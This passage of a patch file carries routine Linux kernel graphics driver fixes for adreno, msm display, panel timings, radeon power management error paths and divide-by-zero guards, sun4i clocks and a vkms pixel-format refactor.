+ 	struct adreno_gpu *adreno_gpu;
+ 	struct msm_gpu *gpu;
+@@ -1766,7 +1767,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 
+ 	nr_rings = 4;
+ 
+-	if (adreno_is_a510(adreno_gpu))
++	if (adreno_cmp_rev(ADRENO_REV(5, 1, 0, ANY_ID), config->rev))
+ 		nr_rings = 1;
+ 
+ 	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, nr_rings);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index c9d1c412628e9..6c0ffe8e4adbd 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -1579,6 +1579,8 @@ static const struct drm_crtc_helper_funcs dpu_crtc_helper_funcs = {
+ struct drm_crtc *dpu_crtc_init(struct drm_device *dev, struct drm_plane *plane,
+ 				struct drm_plane *cursor)
+ {
++	struct msm_drm_private *priv = dev->dev_private;
++	struct dpu_kms *dpu_kms = to_dpu_kms(priv->kms);
+ 	struct drm_crtc *crtc = NULL;
+ 	struct dpu_crtc *dpu_crtc = NULL;
+ 	int i;
+@@ -1610,7 +1612,8 @@ struct drm_crtc *dpu_crtc_init(struct drm_device *dev, struct drm_plane *plane,
+ 
+ 	drm_crtc_helper_add(crtc, &dpu_crtc_helper_funcs);
+ 
+-	drm_crtc_enable_color_mgmt(crtc, 0, true, 0);
++	if (dpu_kms->catalog->dspp_count)
++		drm_crtc_enable_color_mgmt(crtc, 0, true, 0);
+ 
+ 	/* save user friendly CRTC name for later */
+ 	snprintf(dpu_crtc->name, DPU_CRTC_NAME_SIZE, "crtc%u", crtc->base.id);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 32a3c42ec45b1..b2f330e99b0cd 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -79,9 +79,13 @@
+ 
+ #define INTF_SDM845_MASK (0)
+ 
+-#define INTF_SC7180_MASK BIT(DPU_INTF_INPUT_CTRL) | BIT(DPU_INTF_TE)
++#define INTF_SC7180_MASK \
++	(BIT(DPU_INTF_INPUT_CTRL) | \
++	 BIT(DPU_INTF_TE) | \
++	 BIT(DPU_INTF_STATUS_SUPPORTED) | \
++	 BIT(DPU_DATA_HCTL_EN))
+ 
+-#define INTF_SC7280_MASK INTF_SC7180_MASK | BIT(DPU_DATA_HCTL_EN)
++#define INTF_SC7280_MASK (INTF_SC7180_MASK)
+ 
+ #define IRQ_SDM845_MASK (BIT(MDP_SSPP_TOP0_INTR) | \
+ 			 BIT(MDP_SSPP_TOP0_INTR2) | \
+@@ -1199,7 +1203,7 @@ static struct dpu_pingpong_cfg qcm2290_pp[] = {
+ #define MERGE_3D_BLK(_name, _id, _base) \
+ 	{\
+ 	.name = _name, .id = _id, \
+-	.base = _base, .len = 0x100, \
++	.base = _base, .len = 0x8, \
+ 	.features = MERGE_3D_SM8150_MASK, \
+ 	.sblk = NULL \
+ 	}
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h
+index 38aa38ab15685..77c46ce5a22f9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h
+@@ -203,17 +203,19 @@ enum {
+ 
+ /**
+  * INTF sub-blocks
+- * @DPU_INTF_INPUT_CTRL         Supports the setting of pp block from which
+- *                              pixel data arrives to this INTF
+- * @DPU_INTF_TE                 INTF block has TE configuration support
+- * @DPU_DATA_HCTL_EN            Allows data to be transferred at different rate
+-                                than video timing
++ * @DPU_INTF_INPUT_CTRL             Supports the setting of pp block from which
++ *                                  pixel data arrives to this INTF
++ * @DPU_INTF_TE                     INTF block has TE configuration support
++ * @DPU_DATA_HCTL_EN                Allows data to be transferred at different rate
++ *                                  than video timing
++ * @DPU_INTF_STATUS_SUPPORTED       INTF block has INTF_STATUS register
+  * @DPU_INTF_MAX
+  */
+ enum {
+ 	DPU_INTF_INPUT_CTRL = 0x1,
+ 	DPU_INTF_TE,
+ 	DPU_DATA_HCTL_EN,
++	DPU_INTF_STATUS_SUPPORTED,
+ 	DPU_INTF_MAX
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c
+index a35ecb6676c88..696c32d30d10c 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c
+@@ -550,7 +550,7 @@ static void dpu_hw_ctl_intf_cfg_v1(struct dpu_hw_ctl *ctx,
+ 		DPU_REG_WRITE(c, CTL_MERGE_3D_ACTIVE,
+ 			      BIT(cfg->merge_3d - MERGE_3D_0));
+ 	if (cfg->dsc) {
+-		DPU_REG_WRITE(&ctx->hw, CTL_FLUSH, DSC_IDX);
++		DPU_REG_WRITE(&ctx->hw, CTL_FLUSH, BIT(DSC_IDX));
+ 		DPU_REG_WRITE(c, CTL_DSC_ACTIVE, cfg->dsc);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+index 3662df698dae5..c8f14555834a8 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+@@ -52,9 +52,10 @@ static void dpu_hw_dsc_config(struct dpu_hw_dsc *hw_dsc,
+ 	if (is_cmd_mode)
+ 		initial_lines += 1;
+ 
+-	slice_last_group_size = 3 - (dsc->slice_width % 3);
++	slice_last_group_size = (dsc->slice_width + 2) % 3;
++
+ 	data = (initial_lines << 20);
+-	data |= ((slice_last_group_size - 1) << 18);
++	data |= (slice_last_group_size << 18);
+ 	/* bpp is 6.4 format, 4 LSBs bits are for fractional part */
+ 	data |= (dsc->bits_per_pixel << 8);
+ 	data |= (dsc->block_pred_enable << 7);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index b2a94b9a3e987..b9dddf576c029 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -57,6 +57,7 @@
+ #define   INTF_PROG_FETCH_START         0x170
+ #define   INTF_PROG_ROT_START           0x174
+ #define   INTF_MUX                      0x25C
++#define   INTF_STATUS                   0x26C
+ 
+ #define INTF_CFG_ACTIVE_H_EN	BIT(29)
+ #define INTF_CFG_ACTIVE_V_EN	BIT(30)
+@@ -292,8 +293,13 @@ static void dpu_hw_intf_get_status(
+ 		struct intf_status *s)
+ {
+ 	struct dpu_hw_blk_reg_map *c = &intf->hw;
++	unsigned long cap = intf->cap->features;
++
++	if (cap & BIT(DPU_INTF_STATUS_SUPPORTED))
++		s->is_en = DPU_REG_READ(c, INTF_STATUS) & BIT(0);
++	else
++		s->is_en = DPU_REG_READ(c, INTF_TIMING_ENGINE_EN);
+ 
+-	s->is_en = DPU_REG_READ(c, INTF_TIMING_ENGINE_EN);
+ 	s->is_prog_fetch_en = !!(DPU_REG_READ(c, INTF_CONFIG) & BIT(31));
+ 	if (s->is_en) {
+ 		s->frame_count = DPU_REG_READ(c, INTF_FRAME_COUNT);
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index 57b82e5d0ab12..d16c12351adb6 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -1342,9 +1342,9 @@ static int dp_display_remove(struct platform_device *pdev)
+ {
+ 	struct dp_display_private *dp = dev_get_dp_display_private(&pdev->dev);
+ 
++	component_del(&pdev->dev, &dp_display_comp_ops);
+ 	dp_display_deinit_sub_modules(dp);
+ 
+-	component_del(&pdev->dev, &dp_display_comp_ops);
+ 	platform_set_drvdata(pdev, NULL);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index f167a45f1fbdd..b433ccfe4d7da 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -853,17 +853,17 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	 */
+ 	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+ 
+-	/* If slice_per_pkt is greater than slice_per_intf
+-	 * then default to 1. This can happen during partial
+-	 * update.
+-	 */
+-	if (slice_per_intf > dsc->slice_count)
+-		dsc->slice_count = 1;
+-
+ 	total_bytes_per_intf = dsc->slice_chunk_size * slice_per_intf;
+ 
+ 	eol_byte_num = total_bytes_per_intf % 3;
+-	pkt_per_line = slice_per_intf / dsc->slice_count;
++
++	/*
++	 * Typically, pkt_per_line = slice_per_intf * slice_per_pkt.
++	 *
++	 * Since the current driver only supports slice_per_pkt = 1,
++	 * pkt_per_line will be equal to slice per intf for now.
++	 */
++	pkt_per_line = slice_per_intf;
+ 
+ 	if (is_cmd_mode) /* packet data type */
+ 		reg = DSI_COMMAND_COMPRESSION_MODE_CTRL_STREAM0_DATATYPE(MIPI_DSI_DCS_LONG_WRITE);
+@@ -987,7 +987,14 @@ static void dsi_timing_setup(struct msm_dsi_host *msm_host, bool is_bonded_dsi)
+ 		if (!msm_host->dsc)
+ 			wc = hdisplay * dsi_get_bpp(msm_host->format) / 8 + 1;
+ 		else
+-			wc = mode->hdisplay / 2 + 1;
++			/*
++			 * When DSC is enabled, WC = slice_chunk_size * slice_per_pkt + 1.
++			 * Currently, the driver only supports default value of slice_per_pkt = 1
++			 *
++			 * TODO: Expand mipi_dsi_device struct to hold slice_per_pkt info
++			 *       and adjust DSC math to account for slice_per_pkt.
++			 */
++			wc = msm_host->dsc->slice_chunk_size + 1;
+ 
+ 		dsi_write(msm_host, REG_DSI_CMD_MDP_STREAM0_CTRL,
+ 			DSI_CMD_MDP_STREAM0_CTRL_WORD_COUNT(wc) |
+diff --git a/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c b/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c
+index 0f8f4ca464291..f0780c40b379a 100644
+--- a/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c
++++ b/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c
+@@ -539,6 +539,9 @@ static int dsi_pll_14nm_vco_prepare(struct clk_hw *hw)
+ 	if (unlikely(pll_14nm->phy->pll_on))
+ 		return 0;
+ 
++	if (dsi_pll_14nm_vco_recalc_rate(hw, VCO_REF_CLK_RATE) == 0)
++		dsi_pll_14nm_vco_set_rate(hw, pll_14nm->phy->cfg->min_pll_rate, VCO_REF_CLK_RATE);
++
+ 	dsi_phy_write(base + REG_DSI_14nm_PHY_PLL_VREF_CFG1, 0x10);
+ 	dsi_phy_write(cmn_base + REG_DSI_14nm_PHY_CMN_PLL_CNTRL, 1);
+ 
+diff --git a/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c b/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c
+index d1ec80a3e3c72..ef148504cf24a 100644
+--- a/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c
++++ b/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c
+@@ -192,15 +192,15 @@ static int sharp_nt_panel_enable(struct drm_panel *panel)
+ }
+ 
+ static const struct drm_display_mode default_mode = {
+-	.clock = 41118,
++	.clock = (540 + 48 + 32 + 80) * (960 + 3 + 10 + 15) * 60 / 1000,
+ 	.hdisplay = 540,
+ 	.hsync_start = 540 + 48,
+-	.hsync_end = 540 + 48 + 80,
+-	.htotal = 540 + 48 + 80 + 32,
++	.hsync_end = 540 + 48 + 32,
++	.htotal = 540 + 48 + 32 + 80,
+ 	.vdisplay = 960,
+ 	.vsync_start = 960 + 3,
+-	.vsync_end = 960 + 3 + 15,
+-	.vtotal = 960 + 3 + 15 + 1,
++	.vsync_end = 960 + 3 + 10,
++	.vtotal = 960 + 3 + 10 + 15,
+ };
+ 
+ static int sharp_nt_panel_get_modes(struct drm_panel *panel,
+@@ -280,6 +280,7 @@ static int sharp_nt_panel_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 2;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO |
++			MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+ 			MIPI_DSI_MODE_VIDEO_HSE |
+ 			MIPI_DSI_CLOCK_NON_CONTINUOUS |
+ 			MIPI_DSI_MODE_NO_EOT_PACKET;
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 8a3b685c2fcc0..7ca00b0323362 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -759,8 +759,8 @@ static const struct panel_desc ampire_am_480272h3tmqw_t01h = {
+ 	.num_modes = 1,
+ 	.bpc = 8,
+ 	.size = {
+-		.width = 105,
+-		.height = 67,
++		.width = 99,
++		.height = 58,
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X24,
+ };
+diff --git a/drivers/gpu/drm/radeon/ci_dpm.c b/drivers/gpu/drm/radeon/ci_dpm.c
+index 8ef25ab305ae7..b8f4dac68d850 100644
+--- a/drivers/gpu/drm/radeon/ci_dpm.c
++++ b/drivers/gpu/drm/radeon/ci_dpm.c
+@@ -5517,6 +5517,7 @@ static int ci_parse_power_table(struct radeon_device *rdev)
+ 	u8 frev, crev;
+ 	u8 *power_state_offset;
+ 	struct ci_ps *ps;
++	int ret;
+ 
+ 	if (!atom_parse_data_header(mode_info->atom_context, index, NULL,
+ 				   &frev, &crev, &data_offset))
+@@ -5546,11 +5547,15 @@ static int ci_parse_power_table(struct radeon_device *rdev)
+ 		non_clock_array_index = power_state->v2.nonClockInfoIndex;
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+-		if (!rdev->pm.power_state[i].clock_info)
+-			return -EINVAL;
++		if (!rdev->pm.power_state[i].clock_info) {
++			ret = -EINVAL;
++			goto err_free_ps;
++		}
+ 		ps = kzalloc(sizeof(struct ci_ps), GFP_KERNEL);
+-		if (ps == NULL)
+-			return -ENOMEM;
++		if (ps == NULL) {
++			ret = -ENOMEM;
++			goto err_free_ps;
++		}
+ 		rdev->pm.dpm.ps[i].ps_priv = ps;
+ 		ci_parse_pplib_non_clock_info(rdev, &rdev->pm.dpm.ps[i],
+ 					      non_clock_info,
+@@ -5590,6 +5595,12 @@ static int ci_parse_power_table(struct radeon_device *rdev)
+ 	}
+ 
+ 	return 0;
++
++err_free_ps:
++	for (i = 0; i < rdev->pm.dpm.num_ps; i++)
++		kfree(rdev->pm.dpm.ps[i].ps_priv);
++	kfree(rdev->pm.dpm.ps);
++	return ret;
+ }
+ 
+ static int ci_get_vbios_boot_values(struct radeon_device *rdev,
+@@ -5678,25 +5689,26 @@ int ci_dpm_init(struct radeon_device *rdev)
+ 
+ 	ret = ci_get_vbios_boot_values(rdev, &pi->vbios_boot_state);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
+ 		return ret;
+ 	}
+ 
+ 	ret = r600_get_platform_caps(rdev);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
+ 		return ret;
+ 	}
+ 
+ 	ret = r600_parse_extended_power_table(rdev);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
+ 		return ret;
+ 	}
+ 
+ 	ret = ci_parse_power_table(rdev);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
++		r600_free_extended_power_table(rdev);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/radeon/cypress_dpm.c b/drivers/gpu/drm/radeon/cypress_dpm.c
+index fdddbbaecbb74..72a0768df00f7 100644
+--- a/drivers/gpu/drm/radeon/cypress_dpm.c
++++ b/drivers/gpu/drm/radeon/cypress_dpm.c
+@@ -557,8 +557,12 @@ static int cypress_populate_mclk_value(struct radeon_device *rdev,
+ 						     ASIC_INTERNAL_MEMORY_SS, vco_freq)) {
+ 			u32 reference_clock = rdev->clock.mpll.reference_freq;
+ 			u32 decoded_ref = rv740_get_decoded_reference_divider(dividers.ref_div);
+-			u32 clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
+-			u32 clk_v = ss.percentage *
++			u32 clk_s, clk_v;
++
++			if (!decoded_ref)
++				return -EINVAL;
++			clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
++			clk_v = ss.percentage *
+ 				(0x4000 * dividers.whole_fb_div + 0x800 * dividers.frac_fb_div) / (clk_s * 625);
+ 
+ 			mpll_ss1 &= ~CLKV_MASK;
+diff --git a/drivers/gpu/drm/radeon/ni_dpm.c b/drivers/gpu/drm/radeon/ni_dpm.c
+index 672d2239293e0..3e1c1a392fb7b 100644
+--- a/drivers/gpu/drm/radeon/ni_dpm.c
++++ b/drivers/gpu/drm/radeon/ni_dpm.c
+@@ -2241,8 +2241,12 @@ static int ni_populate_mclk_value(struct radeon_device *rdev,
+ 						     ASIC_INTERNAL_MEMORY_SS, vco_freq)) {
+ 			u32 reference_clock = rdev->clock.mpll.reference_freq;
+ 			u32 decoded_ref = rv740_get_decoded_reference_divider(dividers.ref_div);
+-			u32 clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
+-			u32 clk_v = ss.percentage *
++			u32 clk_s, clk_v;
++
++			if (!decoded_ref)
++				return -EINVAL;
++			clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
++			clk_v = ss.percentage *
+ 				(0x4000 * dividers.whole_fb_div + 0x800 * dividers.frac_fb_div) / (clk_s * 625);
+ 
+ 			mpll_ss1 &= ~CLKV_MASK;
+diff --git a/drivers/gpu/drm/radeon/rv740_dpm.c b/drivers/gpu/drm/radeon/rv740_dpm.c
+index d57a3e1df8d63..4464fd21a3029 100644
+--- a/drivers/gpu/drm/radeon/rv740_dpm.c
++++ b/drivers/gpu/drm/radeon/rv740_dpm.c
+@@ -249,8 +249,12 @@ int rv740_populate_mclk_value(struct radeon_device *rdev,
+ 						     ASIC_INTERNAL_MEMORY_SS, vco_freq)) {
+ 			u32 reference_clock = rdev->clock.mpll.reference_freq;
+ 			u32 decoded_ref = rv740_get_decoded_reference_divider(dividers.ref_div);
+-			u32 clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
+-			u32 clk_v = 0x40000 * ss.percentage *
++			u32 clk_s, clk_v;
++
++			if (!decoded_ref)
++				return -EINVAL;
++			clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
++			clk_v = 0x40000 * ss.percentage *
+ 				(dividers.whole_fb_div + (dividers.frac_fb_div / 8)) / (clk_s * 10000);
+ 
+ 			mpll_ss1 &= ~CLKV_MASK;
+diff --git a/drivers/gpu/drm/sun4i/sun4i_tcon.c b/drivers/gpu/drm/sun4i/sun4i_tcon.c
+index 523a6d7879210..936796851ffd3 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_tcon.c
++++ b/drivers/gpu/drm/sun4i/sun4i_tcon.c
+@@ -778,21 +778,19 @@ static irqreturn_t sun4i_tcon_handler(int irq, void *private)
+ static int sun4i_tcon_init_clocks(struct device *dev,
+ 				  struct sun4i_tcon *tcon)
+ {
+-	tcon->clk = devm_clk_get(dev, "ahb");
++	tcon->clk = devm_clk_get_enabled(dev, "ahb");
+ 	if (IS_ERR(tcon->clk)) {
+ 		dev_err(dev, "Couldn't get the TCON bus clock\n");
+ 		return PTR_ERR(tcon->clk);
+ 	}
+-	clk_prepare_enable(tcon->clk);
+ 
+ 	if (tcon->quirks->has_channel_0) {
+-		tcon->sclk0 = devm_clk_get(dev, "tcon-ch0");
++		tcon->sclk0 = devm_clk_get_enabled(dev, "tcon-ch0");
+ 		if (IS_ERR(tcon->sclk0)) {
+ 			dev_err(dev, "Couldn't get the TCON channel 0 clock\n");
+ 			return PTR_ERR(tcon->sclk0);
+ 		}
+ 	}
+-	clk_prepare_enable(tcon->sclk0);
+ 
+ 	if (tcon->quirks->has_channel_1) {
+ 		tcon->sclk1 = devm_clk_get(dev, "tcon-ch1");
+@@ -805,12 +803,6 @@ static int sun4i_tcon_init_clocks(struct device *dev,
+ 	return 0;
+ }
+ 
+-static void sun4i_tcon_free_clocks(struct sun4i_tcon *tcon)
+-{
+-	clk_disable_unprepare(tcon->sclk0);
+-	clk_disable_unprepare(tcon->clk);
+-}
+-
+ static int sun4i_tcon_init_irq(struct device *dev,
+ 			       struct sun4i_tcon *tcon)
+ {
+@@ -1223,14 +1215,14 @@ static int sun4i_tcon_bind(struct device *dev, struct device *master,
+ 	ret = sun4i_tcon_init_regmap(dev, tcon);
+ 	if (ret) {
+ 		dev_err(dev, "Couldn't init our TCON regmap\n");
+-		goto err_free_clocks;
++		goto err_assert_reset;
+ 	}
+ 
+ 	if (tcon->quirks->has_channel_0) {
+ 		ret = sun4i_dclk_create(dev, tcon);
+ 		if (ret) {
+ 			dev_err(dev, "Couldn't create our TCON dot clock\n");
+-			goto err_free_clocks;
++			goto err_assert_reset;
+ 		}
+ 	}
+ 
+@@ -1293,8 +1285,6 @@ static int sun4i_tcon_bind(struct device *dev, struct device *master,
+ err_free_dotclock:
+ 	if (tcon->quirks->has_channel_0)
+ 		sun4i_dclk_free(tcon);
+-err_free_clocks:
+-	sun4i_tcon_free_clocks(tcon);
+ err_assert_reset:
+ 	reset_control_assert(tcon->lcd_rst);
+ 	return ret;
+@@ -1308,7 +1298,6 @@ static void sun4i_tcon_unbind(struct device *dev, struct device *master,
+ 	list_del(&tcon->list);
+ 	if (tcon->quirks->has_channel_0)
+ 		sun4i_dclk_free(tcon);
+-	sun4i_tcon_free_clocks(tcon);
+ }
+ 
+ static const struct component_ops sun4i_tcon_ops = {
+diff --git a/drivers/gpu/drm/vkms/vkms_composer.c b/drivers/gpu/drm/vkms/vkms_composer.c
+index 8e53fa80742b2..80164e79af006 100644
+--- a/drivers/gpu/drm/vkms/vkms_composer.c
++++ b/drivers/gpu/drm/vkms/vkms_composer.c
+@@ -99,7 +99,7 @@ static void blend(struct vkms_writeback_job *wb,
+ 			if (!check_y_limit(plane[i]->frame_info, y))
+ 				continue;
+ 
+-			plane[i]->plane_read(stage_buffer, plane[i]->frame_info, y);
++			vkms_compose_row(stage_buffer, plane[i], y);
+ 			pre_mul_alpha_blend(plane[i]->frame_info, stage_buffer,
+ 					    output_buffer);
+ 		}
+@@ -118,7 +118,7 @@ static int check_format_funcs(struct vkms_crtc_state *crtc_state,
+ 	u32 n_active_planes = crtc_state->num_active_planes;
+ 
+ 	for (size_t i = 0; i < n_active_planes; i++)
+-		if (!planes[i]->plane_read)
++		if (!planes[i]->pixel_read)
+ 			return -1;
+ 
+ 	if (active_wb && !active_wb->wb_write)
+diff --git a/drivers/gpu/drm/vkms/vkms_drv.h b/drivers/gpu/drm/vkms/vkms_drv.h
+index 0a67b8073f7e5..de4efc0a3bd01 100644
+--- a/drivers/gpu/drm/vkms/vkms_drv.h
++++ b/drivers/gpu/drm/vkms/vkms_drv.h
+@@ -56,8 +56,7 @@ struct vkms_writeback_job {
+ struct vkms_plane_state {
+ 	struct drm_shadow_plane_state base;
+ 	struct vkms_frame_info *frame_info;
+-	void (*plane_read)(struct line_buffer *buffer,
+-			   const struct vkms_frame_info *frame_info, int y);
++	void (*pixel_read)(u8 *src_buffer, struct pixel_argb_u16 *out_pixel);
+ };
+ 
+ struct vkms_plane {
+@@ -155,6 +154,7 @@ int vkms_verify_crc_source(struct drm_crtc *crtc, const char *source_name,
+ /* Composer Support */
+ void vkms_composer_worker(struct work_struct *work);
+ void vkms_set_composer(struct vkms_output *out, bool enabled);
++void vkms_compose_row(struct line_buffer *stage_buffer, struct vkms_plane_state *plane, int y);
+ 
+ /* Writeback */
+ int vkms_enable_writeback_connector(struct vkms_device *vkmsdev);
+diff --git a/drivers/gpu/drm/vkms/vkms_formats.c b/drivers/gpu/drm/vkms/vkms_formats.c
+index d4950688b3f17..b11342026485f 100644
+--- a/drivers/gpu/drm/vkms/vkms_formats.c
++++ b/drivers/gpu/drm/vkms/vkms_formats.c
+@@ -42,100 +42,75 @@ static void *get_packed_src_addr(const struct vkms_frame_info *frame_info, int y
+ 	return packed_pixels_addr(frame_info, x_src, y_src);
+ }
+ 
+-static void ARGB8888_to_argb_u16(struct line_buffer *stage_buffer,
+-				 const struct vkms_frame_info *frame_info, int y)
++static void ARGB8888_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u8 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
+-
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		/*
+-		 * The 257 is the "conversion ratio". This number is obtained by the
+-		 * (2^16 - 1) / (2^8 - 1) division. Which, in this case, tries to get
+-		 * the best color value in a pixel format with more possibilities.
+-		 * A similar idea applies to others RGB color conversions.
+-		 */
+-		out_pixels[x].a = (u16)src_pixels[3] * 257;
+-		out_pixels[x].r = (u16)src_pixels[2] * 257;
+-		out_pixels[x].g = (u16)src_pixels[1] * 257;
+-		out_pixels[x].b = (u16)src_pixels[0] * 257;
+-	}
++	/*
++	 * The 257 is the "conversion ratio". This number is obtained by the
++	 * (2^16 - 1) / (2^8 - 1) division. Which, in this case, tries to get
++	 * the best color value in a pixel format with more possibilities.
++	 * A similar idea applies to others RGB color conversions.
++	 */
++	out_pixel->a = (u16)src_pixels[3] * 257;
++	out_pixel->r = (u16)src_pixels[2] * 257;
++	out_pixel->g = (u16)src_pixels[1] * 257;
++	out_pixel->b = (u16)src_pixels[0] * 257;
+ }
+ 
+-static void XRGB8888_to_argb_u16(struct line_buffer *stage_buffer,
+-				 const struct vkms_frame_info *frame_info, int y)
++static void XRGB8888_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u8 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
+-
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		out_pixels[x].a = (u16)0xffff;
+-		out_pixels[x].r = (u16)src_pixels[2] * 257;
+-		out_pixels[x].g = (u16)src_pixels[1] * 257;
+-		out_pixels[x].b = (u16)src_pixels[0] * 257;
+-	}
++	out_pixel->a = (u16)0xffff;
++	out_pixel->r = (u16)src_pixels[2] * 257;
++	out_pixel->g = (u16)src_pixels[1] * 257;
++	out_pixel->b = (u16)src_pixels[0] * 257;
+ }
+ 
+-static void ARGB16161616_to_argb_u16(struct line_buffer *stage_buffer,
+-				     const struct vkms_frame_info *frame_info,
+-				     int y)
++static void ARGB16161616_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u16 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
++	u16 *pixels = (u16 *)src_pixels;
+ 
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		out_pixels[x].a = le16_to_cpu(src_pixels[3]);
+-		out_pixels[x].r = le16_to_cpu(src_pixels[2]);
+-		out_pixels[x].g = le16_to_cpu(src_pixels[1]);
+-		out_pixels[x].b = le16_to_cpu(src_pixels[0]);
+-	}
++	out_pixel->a = le16_to_cpu(pixels[3]);
++	out_pixel->r = le16_to_cpu(pixels[2]);
++	out_pixel->g = le16_to_cpu(pixels[1]);
++	out_pixel->b = le16_to_cpu(pixels[0]);
+ }
+ 
+-static void XRGB16161616_to_argb_u16(struct line_buffer *stage_buffer,
+-				     const struct vkms_frame_info *frame_info,
+-				     int y)
++static void XRGB16161616_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u16 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
++	u16 *pixels = (u16 *)src_pixels;
+ 
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		out_pixels[x].a = (u16)0xffff;
+-		out_pixels[x].r = le16_to_cpu(src_pixels[2]);
+-		out_pixels[x].g = le16_to_cpu(src_pixels[1]);
+-		out_pixels[x].b = le16_to_cpu(src_pixels[0]);
+-	}
++	out_pixel->a = (u16)0xffff;
